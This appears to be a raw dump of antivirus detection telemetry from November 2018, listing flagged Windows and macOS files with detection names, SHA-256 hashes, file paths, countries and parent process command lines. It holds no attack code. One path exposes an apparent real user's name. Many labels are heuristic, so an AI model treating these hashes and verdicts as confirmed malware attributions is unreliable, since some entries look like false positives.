  Row(detection=Row(filename='avscan-20181104-173232-a77b18d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10135bc4\\AVSCAN-20181104-172847-8E9DA678\\AVSCAN-20181104-173232-A77B18D1', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:32:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='iso2[1].htm', filepath='C:\\Users\\X\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\Cache\\YU2YMBL6\\iso2[1].htm', filesize=20000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='6311b05ecddcd0a31e8eeb7ebda701d6257f0a161a2cce498ef7bc517d1a822a', metadata=Row(cmdline='-ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca', country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\SystemApps\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\MicrosoftEdgeCP.exe', parentsize=185776, timestamp='2018-11-04T15:40:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service_kms.vir', filepath='C:\\Program Files\\KMSpico\\Service_KMS.VIR', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='--engine=2 --session-id=WzsJimFyRuiBDuuZeegJN5nPkZnpUX81m2YPgA+t --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=12095608, timestamp='2018-11-04T21:12:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='ba0f1a2711f53d6b3f56509a2c6666e906df2b03877e58977849a153f8f3b4ed', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T17:50:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202711-66954426', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5c0c430\\AVSCAN-20181104-202655-64784597\\AVSCAN-20181104-202711-66954426', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='abbf959ac30d23cf2882ec223966b0b8c30ae85415ccfc41a5924b29cd6bd4db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T18:26:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:22:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='b6375211c31e9c4e45168974ca171e084c36f9de88c5c888f659ff3c106a3445', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T19:18:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='_--_------_-___-____-__-____-____-_-___._--_------_-___-____-__-____-____-_-___', filepath='f:\\\xa0\\_--_------_-___-____-__-____-____-_-___._--_------_-___-____-__-____-____-_-___', filesize=8312000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='b642e30493f7bc210131c551cc5c781976101859ce90a6e3e0c0a8383afafabc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsh51E4.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T17:34:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151413-4a0a26ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_465de9c8\\AVSCAN-20181104-151350-4688E5C1\\AVSCAN-20181104-151413-4A0A26EC', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:14:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a23c3', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a23c3', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:07:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180824-f75197ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3be9c2bd\\AVSCAN-20181104-180534-D5BE5E3E\\AVSCAN-20181104-180824-F75197AD', filesize=832000, name='HEUR/APC.#M1.#R1'), hash='c04100433a92893732ec84902b22532a3f937c0efa604f7589c5332599a565c0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:08:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='remotecomputermanager.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\RemoteComputerManager.exe", filesize=64000, name='TR/Siggen.xihzp.#M1.#R1'), hash='a7ed3c6e720bab5155c6714d4501312d8a818f21f7aa39ca31a3c882eb00c6a5', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\9CB3C525708BF734CEBFF469B26C95C8C641311A1701BB9535645632D3CC6620', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='9cb3c525708bf734cebff469b26c95c8c641311a1701bb9535645632d3cc6620', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:14:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sentstrt.exe', filepath='\\?\\G:\\PLC程式\\GT-D V6.42\\GT-D V6.4\\GT-D V6.4\\SystemDriverOld\\WIN_9x\\sentstrt.exe', filesize=256000, name='W32/Jadtre.K.#M1.#R1'), hash='d62ba0252f0d12c4b5a7f126c246f1e1b68da0088097afc8f94c9d765dd52746', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:29:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngtp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{EC6F2C17-FD0A-4CBB-BF5F-B973B9BA79FA}\\E_FARNGTP.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='7f0610e3ff3c1e082d0b9d2a2d844a1e351290ab2763e1585498df432561900c', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:30:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T13:30:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T21:38:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsa7D73.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:38:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uuchcwfw.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\UuCHCWFw.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:04:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xg9hokina8n4gw.x64.dll.vir', filepath='c:\\qoobox\\quarantine\\c\\program files (x86)\\saveenewwaappz\\xg9hoKiNa8N4GW.x64.dll.vir', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M300.#R300238'), hash='caad81c5452b79d8d945171eab19930cc89c357c433348de1a76e31743069889', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:14:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='82d0187b163f5a6dc502ecba80d7f08f2edc71d9ac4de685c3f3af0809cece5c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gutterman.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Gutterman\\Gutterman.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='a412281a455c5f83b9fee64c1725a50241a0f9917bd531b2a2ded0fda300cfc5', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:54:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ptedit32.exe', filepath='I:\\BACKUPs--125GB\\Program Files\\Symantec\\Norton PartitionMagic 8.0\\RESCUEME\\DOSYSTEM\\PTEDIT32.EXE', filesize=512000, name='TR/Patched.Gen.#M300.#R2947'), hash='92370f2470ec2deb9200739fabb4edb783634d53a052710893053be98703ea24', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T20:22:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adb.exe', filepath='E:\\Program Files\\SRSRoot\\adb.exe', filesize=896000, name='W32/Sality.AT.#M1.#R1'), hash='dba925fd5808e08c2accddcbf25f4ec77c6b72268dbed4df221f1ddea2015655', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsuE72B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:48:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jewelquest.exe', filepath='C:\\Program Files\\GameHouse\\JewelQuest\\JewelQuest.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='d7388e48476a747697edc7a875d41f0df0e39033a44e40a82904e4aca8aeabb6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T03:01:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smkydvfr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\smkYDvfr.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:03:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-091149-abf71846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_641457ed\\AVSCAN-20181102-090605-7FFAB041\\AVSCAN-20181102-091149-ABF71846', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e52f697d0f0f42584359c24d42aebacf2b0971c3b67ba08c610287e9660edc2d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\E52F697D0F0F42584359C24D42AEBACF2B0971C3B67BA08C610287E9660EDC2D', filesize=2176000, name='HEUR/AGEN.1017525.#M1.#R1'), hash='e52f697d0f0f42584359c24d42aebacf2b0971c3b67ba08c610287e9660edc2d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:08:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='controlpanel.exe', filepath='C:\\Program Files\\SmarThru 4\\ControlPanel.exe', filesize=512000, name='W32/Sality.AT.#M0.#R0'), hash='9bd36db0c3a80d4ce945da667a80c5cf7bf8dcdd90c72beb2b3ec1502993641c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T05:42:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-075708-23b07316', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-075708-23B07316', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='a41f0021e269dc55a28db460807bc14334adb3ee00d942832c42b630ed4db51f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_2024aee9.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_2024aee9.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:01:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='8d08f3a333a6cf026bb243fada0682650b148d58949dc6a48714268893873c03', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:16:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-094335-11cd1c09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_18479074\\AVSCAN-20181102-094304-0C655DEC\\AVSCAN-20181102-094335-11CD1C09', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ca1bd75f0e3ccf666ca718880e6866dcd54ee8b3e832d962f7e6c894994e1b7b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:43:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='df5f7e0182e1719ab5ef18eb7bf9522d_2b1b96ab.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-02_20-58-22\\df5f7e0182e1719ab5ef18eb7bf9522d_2b1b96ab.exe', filesize=2496000, name='HEUR/AGEN.1007445.#M1.#R1'), hash='8a0ba8074f6d157cac3a04b807bbdbe6b8cfb2e6b109d7c90b71523d52e9537e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe70_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe70 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T20:01:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='installs.exe', filepath='C:\\Program Files\\SolidWorks Corp\\SolidWorks Flow Simulation\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='b04d8e411d34db8073db8bc4e5fd6dcb27af7cef2c1c06a8369da191f9178ae3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:R+Sn98fajEKZ9QV1.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:39:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='a7a0fd00806114fe7d21a90490249b6cf7a2850ba6b44579093c538d5ff6d9d0', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-210829-b8e167ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_64ccd49c\\AVSCAN-20181102-205804-7B397E26\\AVSCAN-20181102-210829-B8E167AB', filesize=292000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='93a28ac7e41c7781fd432898f957a40b65756057f131afbbbc60ead805e9886b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T19:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7C63A674-7475-4F34-AAD8-AB6ADBE6A158}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b0a3b047cfeb2de4454612b57d453577fb504670c64636565922381fa7c5fa0b', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:41:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mappe concettuali.exe', filepath='\\\\ts-xelcea\\share\\ROBERTO\\Roberto\\programmi\\Mappe Concettuali.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='9d5474ab118826102c3fcb29558ce07cda47e87bd27d0f3ecbeda8f171b07faa', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:46:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mdsched.exe', filepath='C:\\Windows\\System32\\MdSched.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='f09faf00f06ade841b508c057937ddbb12d306934f1a8de5fb9148d333731f6b', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:13:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-203640-fa562185', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-203640-FA562185', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:36:41Z'), dt=datetime.date(2018, 11, 4)),
